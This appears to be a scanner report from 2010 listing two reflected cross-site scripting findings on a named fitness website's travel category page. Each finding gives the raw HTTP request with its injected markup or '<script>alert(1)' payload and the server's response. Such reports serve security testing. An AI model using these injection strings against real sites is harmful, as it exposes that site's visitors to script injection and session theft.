1. Cross-site scripting (reflected)
1.1. http://www.thatsfit.com/category/fit-travel/ [REST URL parameter 2]
Severity: | High |
Confidence: | Firm |
Host: | http://www.thatsfit.com |
Path: | /category/fit-travel/ |
GET /category/fit-traveld8afc"><a>d261ddb95bf/ HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 18:03:04 GMT Server: Apache/2.2 Set-Cookie: PHPSESSID=6a6599d0fa Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=999971 Connection: Keep-Alive Content-Type: text/html Content-Length: 34251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- beacon js starts --> < ...[SNIP]... <link rel="canonical" href="http://www.thatsfit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thatsfit.com |
Path: | /category/fit-travel/ |
GET /category/fit-travel/?40cc1"><script>alert(1)< Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 18:02:52 GMT Server: Apache/2.2 Set-Cookie: PHPSESSID=b469a26a8a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=999878 Connection: Keep-Alive Content-Type: text/html Content-Length: 49036 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- beacon js starts --> < ...[SNIP]... <link rel="canonical" href="http://www.thatsfit ...[SNIP]... |